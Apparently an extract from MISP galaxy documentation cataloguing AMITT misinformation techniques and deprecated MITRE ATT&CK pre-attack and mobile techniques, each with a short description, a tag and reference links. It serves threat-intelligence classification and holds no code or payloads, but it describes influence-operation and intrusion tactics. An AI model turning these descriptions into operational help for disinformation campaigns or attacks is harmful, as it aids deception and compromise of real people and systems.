Hack or take over legitimate accounts to distribute misinformation or damaging content. Examples include Syrian Electronic Army (2013) series of false tweets from a hijacked Associated Press Twitter account claiming that President Barack Obama had been injured in a series of explosions near the White House. The false report caused a temporary plunge of 143 points on the Dow Jones Industrial Average.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Hijack legitimate account"

**Use concealment**

Use anonymous social media profiles. Examples include page or group administrators, masked "whois" website directory data, no bylines connected to news article, no masthead connect to news websites.

Example is 2016 @TEN_GOP profile where the actual Tennessee Republican Party tried unsuccessfully for months to get Twitter to shut it down, and 2019 Endless Mayfly is an Iran-aligned network of inauthentic personas and social media accounts that spreads falsehoods and amplifies narratives critical of Saudi Arabia, the United States, and Israel.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Use concealment"

**Create fake websites**

The tag is: `misp-galaxy:amitt-misinformation-pattern="Create fake websites"
Create funding campaigns

Generate revenue through online funding campaigns. e.g. Gather data, advance credible persona via Gofundme; Patreon; or via fake website connecting via PayPal or Stripe. (Example 2016) #VaccinateUS Gofundme campaigns to pay for Targetted facebook ads (Larry Cook, targetting Washington State mothers, $1,776 to boost posts over 9 months).

The tag is: `mis-p-galaxy:amitt-misinformation-pattern="Create funding campaigns"`

Table 2847. Table References

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Create hashtag

Many incident-based campaigns will create a hashtag to promote their fabricated event (e.g. #ColumbianChemicals to promote a fake story about a chemical spill in Louisiana).

Creating a hashtag for an incident can have two important effects: 1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name! 2. Publicize the story more widely through trending lists and search behavior

Asset needed to direct/control/manage "conversation" connected to launching new incident/campaign with new hashtag for applicable social media sites ie: Twitter, LinkedIn)

The tag is: `mis-p-galaxy:amitt-misinformation-pattern="Create hashtag"`

Table 2848. Table References

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Clickbait

Create attention grabbing headlines (outrage, doubt, humor) required to drive traffic & engagement. (example 2016) “Pope Francis shocks world, endorses Donald Trump for president.” (example 2016) ”FBI director received millions from Clinton Foundation, his brother’s law firm does Clinton’s taxes”. This is a key asset

The tag is: `mis-p-galaxy:amitt-misinformation-pattern="Clickbait"`

Table 2849. Table References

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**Promote online funding**

Drive traffic/engagement to funding campaign sites; helps provide measurable metrics to assess conversion rates

The tag is: `misp-galaxy:amitt-misinformation-pattern="Promote online funding"`

*Table 2850. Table References*

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**Paid targeted ads**

Create or fund advertisements targeted at specific populations

The tag is: `misp-galaxy:amitt-misinformation-pattern="Paid targeted ads"`

*Table 2851. Table References*

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**Generate information pollution**

Flood social channels; drive traffic/engagement to all assets; create aura/sense/perception of pervasiveness/consensus (for or against or both simultaneously) of an issue or topic. "Nothing is true, but everything is possible." Akin to astroturfing campaign.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Generate information pollution"`

*Table 2852. Table References*

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**Trial content**

Iteratively test incident performance (messages, content etc), e.g. A/B test headline/content engagement metrics; website and/or funding campaign conversion rates

The tag is: `misp-galaxy:amitt-misinformation-pattern="Trial content"`

*Table 2853. Table References*

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**Memes**

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Memes"`

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**Conspiracy narratives**

"Conspiracy narratives appeal to the human desire for explanatory order, by invoking the participation of powerful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalized or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the "'firehose of falsehoods'" model.

Example: QAnon: conspiracy theory is an explanation of an event or situation that invokes a conspiracy by sinister and powerful actors, often political in motivation, when other explanations are more probable "

The tag is: `misp-galaxy:amitt-misinformation-pattern="Conspiracy narratives"`

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**Distort facts**

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Examples: images and ideas can be distorted by being placed in an improper content

The tag is: `misp-galaxy:amitt-misinformation-pattern="Distort facts"

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</table>
Create fake videos and images

Create fake videos and/or images by manipulating existing content or generating new content (e.g. deepfakes). Examples include Pelosi video (making her appear drunk) and photoshoped shark on flooded streets of Houston TX.

The tag is: \textit{misp-galaxy:amitt-misinformation-pattern="Create fake videos and images"}

\textit{Table 2857. Table References}

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Leak altered documents

Obtain documents (eg by theft or leak), then alter and release, possibly among factual documents/sources.

Example (2019) DFRLab report "Secondary Infektion" highlights incident with key asset being a forged “letter” created by the operation to provide ammunition for far-right forces in Europe ahead of the election.

The tag is: \textit{misp-galaxy:amitt-misinformation-pattern="Leak altered documents"}

\textit{Table 2858. Table References}

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</table>

Create fake research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target Climate Science debate or pseudoscience like anti-vaxx

The tag is: \textit{misp-galaxy:amitt-misinformation-pattern="Create fake research"}

\textit{Table 2859. Table References}

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Adapt existing narratives

Adapting existing narratives to current operational goals is the tactical sweet-spot for an effective misinformation campaign. Leveraging existing narratives is not only more effective, it requires substantially less resourcing, as the promotion of new master narratives operates on a much larger scale, both time and scope. Fluid, dynamic & often interchangable key master narratives can be
(“The morally corrupt West”) adapted to divisive (LGBT propaganda) or to distort (individuals working as CIA operatives). For Western audiences, different but equally powerful framings are available, such as “USA has a fraught history in race relations, especially in criminal justice areas.”

The tag is: misp-galaxy:amitt-misinformation-pattern="Adapt existing narratives"

Create competing narratives

“Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.”

The tag is: misp-galaxy:amitt-misinformation-pattern="Create competing narratives"

Manipulate online polls

Create fake online polls, or manipulate existing online polls. Examples: flooding FCC with comments; creating fake engagement metrics of Twitter/Facebook polls to manipulate perception of given issue. Data gathering tactic to target those who engage, and potentially their networks of friends/followers as well

The tag is: misp-galaxy:amitt-misinformation-pattern="Manipulate online polls"
**Backstop personas**

Create other assets/dossier/cover/fake relationships and/or connections or documents, sites, bylines, attributions, to establish/augment/inflate credibility/believability.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Backstop personas"`

**Table 2863. Table References**

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**YouTube**

Use YouTube as a narrative dissemination channel.

The tag is: `misp-galaxy:amitt-misinformation-pattern="YouTube"`

**Table 2864. Table References**

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**Reddit**

Use Reddit as a narrative dissemination channel.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Reddit"`

**Table 2865. Table References**

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**Instagram**

Use Instagram as a narrative dissemination channel.

The tag is: `misp-galaxy:amitt-misinformation-pattern="Instagram"`

**Table 2866. Table References**

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**LinkedIn**

Use LinkedIn as a narrative dissemination channel.
Pinterest

Use Pinterest as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Pinterest"

WhatsApp

Use WhatsApp as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="WhatsApp"

Facebook

Use Facebook as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Facebook"

Twitter

Use Twitter as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter"
Bait legitimate influencers
The tag is: misp-galaxy:amitt-misinformation-pattern="Bait legitimate influencers"

Table 2872. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0039.md

Demand unsurmountable proof
The tag is: misp-galaxy:amitt-misinformation-pattern="Demand unsurmountable proof"

Table 2873. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0040.md

Deny involvement
The tag is: misp-galaxy:amitt-misinformation-pattern="Deny involvement"

Table 2874. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0041.md

Kernel of Truth
The tag is: misp-galaxy:amitt-misinformation-pattern="Kernel of Truth"

Table 2875. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0042.md

Use SMS/ WhatsApp/ Chat apps
The tag is: misp-galaxy:amitt-misinformation-pattern="Use SMS/ WhatsApp/ Chat apps"

Table 2876. Table References
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https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0043.md
Seed distortions

The tag is: misp-galaxy:amitt-misinformation-pattern="Seed distortions"

Table 2877. Table References

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Use fake experts

Use the fake experts that were set up in T0009. Pseudo-experts are disposable assets that often appear once and then disappear. Give "credility" to misinformation. Take advantage of credential bias

The tag is: misp-galaxy:amitt-misinformation-pattern="Use fake experts"

Table 2878. Table References

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Search Engine Optimization

Manipulate content engagement metrics (ie: Reddit & Twitter) to influence/impact news search results (e.g. Google), also elevates RT & Sputnik headline into Google news alert emails. aka "Black-hat SEO"

The tag is: misp-galaxy:amitt-misinformation-pattern="Search Engine Optimization"

Table 2879. Table References

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Muzzle social media as a political force

Use political influence or the power of state to stop critical social media comments. Government requested/driven content take downs (see Google Transparency reports. (Example 20190 Singapore Protection from Online Falsehoods and Manipulation Bill would make it illegal to spread "false statements of fact" in Singapore, where that information is "prejudicial" to Singapore's security or "public tranquility." Or India/New Delhi has cut off services to Facebook and Twitter in Kashmir 28 times in the past five years, and in 2016, access was blocked for five months — on the grounds that these platforms were being used for anti-social and "anti-national" purposes.

The tag is: misp-galaxy:amitt-misinformation-pattern="Muzzle social media as a political force"

Table 2880. Table References
Cow online opinion leaders

Intimidate, coerce, threaten critics/dissidents/journalists via trolling, doxing. Phillipines (example) Maria Ressa and Rappler journalists targeted Duterte regime, lawsuits, trollings, banned from the presidential palace where press briefings take place. 2017 Bot attack on five ProPublica Journalists.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cow online opinion leaders"

Flooding

Flooding and/or mobbing social media channels feeds and/or hashtag with excessive volume of content to control/shape online conversations and/or drown out opposing points of view. Bots and/or patriotic trolls are effective tools to achieve this effect.

Example (2018): bots flood social media promoting messages which support Saudi Arabia with intent to cast doubt on allegations that the kingdom was involved in Khashoggi's death.

The tag is: misp-galaxy:amitt-misinformation-pattern="Flooding"

Cheerleading domestic social media ops

Deploy state-coordinated social media commenters and astroturfers. Both internal/domestic and external social media influence operations, popularized by China (50cent Army manage message inside the "Great Firewall") but also technique used by Chinese English-language social media influence operations are seeded by state-run media, which overwhelmingly present a positive, benign, and cooperative image of China.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cheerleading domestic social media ops"
Fabricate social media comment

Use government-paid social media commenters, astroturfers, chat bots (programmed to reply to specific key words/hashtags) influence online conversations, product reviews, web-site comment forums. (2017 example) the FCC was inundated with nearly 22 million public comments on net neutrality (many from fake accounts)

The tag is: misp-galaxy:amitt-misinformation-pattern="Fabricate social media comment"

Table 2884. Table References

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Tertiary sites amplify news

Create content/news/opinion web-sites to cross-post stories. Tertiary sites circulate and amplify narratives. Often these sites have no masthead, bylines or attribution.

Examples of tertiary sites include Russia Insider, The Duran, geopolitica.ru, Mint Press News, Oriental Review, globalresearch.ca.

Example (2019, Domestic news): Snopes reveals Star News Digital Media, Inc. may look like a media company that produces local news, but operates via undisclosed connections to political activism.

Example (2018) FireEye reports on Iranian campaign that created between April 2018 and March 2019 sites used to spread inauthentic content from websites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms.

The tag is: misp-galaxy:amitt-misinformation-pattern="Tertiary sites amplify news"

Table 2885. Table References

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Twitter trolls amplify and manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operating to support individuals/narratives from the entire political spectrum (left/right binary). Operating with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive political content, as it’s easier to amplify existing content than create new/original content. Trolls operate where ever there’s a socially divisive issue (issues that can/are be politicized) e.g. BlackLivesMatter or MeToo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter trolls amplify and manipulate"

Table 2886. Table References
Twitter bots amplify

Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (ie: automatically retweet or like) and give appearance it's more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are an inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms are more responsive.(example 2019) #TrudeauMustGo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter bots amplify"

Use hashtag

Use the dedicated hashtag for the incident (e.g. #PhosphorusDisaster)

The tag is: misp-galaxy:amitt-misinformation-pattern="Use hashtag"

Dedicated channels disseminate information pollution

Output information pollution (e.g. articles on an unreported false story/event) through channels controlled by or related to the incident creator. Examples include RT/Sputnik or antivax websites seeding stories.

The tag is: misp-galaxy:amitt-misinformation-pattern="Dedicated channels disseminate information pollution"

Organise remote rallies and events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings
in support of incident narratives. Example: Facebook groups/pages coordinate/more divisive/polarizing groups and activities into the public space. (Example) Mueller’s report, highlights, the IRA organized political rallies in the U.S. using social media starting in 2015 and continued to coordinate rallies after the 2016 election

The tag is: misp-galaxy:amitt-misinformation-pattern="Organise remote rallies and events"

Table 2890. Table References

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**Legacy web content**

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:amitt-misinformation-pattern="Legacy web content"

Table 2891. Table References

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**Play the long game**

The tag is: misp-galaxy:amitt-misinformation-pattern="Play the long game"

Table 2892. Table References

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<td><a href="https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0059.md">https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0059.md</a></td>
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**Continue to amplify**

The tag is: misp-galaxy:amitt-misinformation-pattern="Continue to amplify"

Table 2893. Table References

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<td><a href="https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0060.md">https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0060.md</a></td>
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**Sell merchandising**

Sell hats, t-shirts, flags and other branded content that’s designed to be seen in the real world

The tag is: misp-galaxy:amitt-misinformation-pattern="Sell merchandising"

Table 2894. Table References
Attack Pattern

ATT&CK tactic.

Attack Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

The tag is: misp-galaxy:mitre-attack-pattern="Test ability to evade automated mobile application security analysis performed by app stores - T1393"

Table 2895. Table References

Links

https://attack.mitre.org/techniques/T1393

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1391).

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the
developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

The tag is: `misp-galaxy:mitre-attack-pattern="Choose pre-compromised mobile app developer account credentials or signing keys - T1391"`

### Enumerate externally facing software applications technologies, languages, and dependencies - T1261

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

The tag is: `misp-galaxy:mitre-attack-pattern="Enumerate externally facing software applications technologies, languages, and dependencies - T1261"`

### Obtain Apple iOS enterprise distribution key pair and certificate - T1392

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1392).

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideload ing Change)

The tag is: `misp-galaxy:mitre-attack-pattern="Obtain Apple iOS enterprise distribution key pair and certificate - T1392"`
Analyze social and business relationships, interests, and affiliations - T1295

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).

Social media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze social and business relationships, interests, and affiliations - T1295"

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform's permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: `<code>chown</code>` (short for change owner), and `<code>chmod</code>` (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002"
Install and configure hardware, network, and systems - T1336

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1336).

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

The tag is: `misp-galaxy:mitre-attack-pattern="Install and configure hardware, network, and systems - T1336"`

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

The tag is: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party or closed-source vulnerability/exploit information - T1354"`
Discover new exploits and monitor exploit-provider forums - T1350

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1350).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

The tag is: misp-galaxy:mitre-attack-pattern="Discover new exploits and monitor exploit-provider forums - T1350"

Table 2903. Table References

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<td><a href="https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf">https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf</a></td>
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Acquire and/or use 3rd party software services - T1330

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330"

Acquire and/or use 3rd party software services - T1330 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308" with estimative-language:likelihood-probability="almost-certain"

Table 2904. Table References

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Acquire and/or use 3rd party infrastructure services - T1307

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

The tag is: `misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307"

Acquire and/or use 3rd party infrastructure services - T1307 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"

Table 2905. Table References

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Acquire and/or use 3rd party software services - T1308

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)

The tag is: `misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308"

Acquire and/or use 3rd party software services - T1308 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

Table 2906. Table References

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Test signature detection for file upload/email filters - T1361

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1361).

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection for file upload/email filters - T1361"

Table 2907. Table References

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Acquire and/or use 3rd party infrastructure services - T1329

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1329).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329"

Acquire and/or use 3rd party infrastructure services - T1329 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307" with estimative-language:likelihood-probability="almost-certain"

Table 2908. Table References

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Acquire or compromise 3rd party signing certificates - T1310

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

The tag is: `misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310"`

Acquire or compromise 3rd party signing certificates - T1310 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332"` with estimative-language:likelihood-probability="almost-certain"

Table 2909. Table References

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Compromise 3rd party infrastructure to support delivery - T1312

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312"`

Compromise 3rd party infrastructure to support delivery - T1312 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"` with estimative-language:likelihood-probability="almost-certain"

Table 2910. Table References

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Acquire or compromise 3rd party signing certificates - T1332

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

The tag is: `misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332"`

Acquire or compromise 3rd party signing certificates - T1332 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310"` with `estimative-language:likelihood-probability="almost-certain"

### Table 2911. Table References

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Compromise 3rd party infrastructure to support delivery - T1334

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1334).

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"

Compromise 3rd party infrastructure to support delivery - T1334 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312"` with `estimative-language:likelihood-probability="almost-certain"

### Table 2912. Table References
Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a ‘found’ CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

The tag is: misp-galaxy:mitre-attack-pattern="Human performs requested action of physical nature - T1385"

Table 2913. Table References

Links

https://attack.mitre.org/techniques/T1385


Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple’s App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple’s App Store.

Platforms: iOS

The tag is: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445"

Abuse of iOS Enterprise App Signing Key - T1445 has relationships with:

• revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 2914. Table References

Links

https://attack.mitre.org/techniques/T1445
Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

- [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)
- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target’s Google account to use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

The tag is: `misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475"

Table 2915. Table References

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Device Unlock Code Guessing or Brute Force - T1459

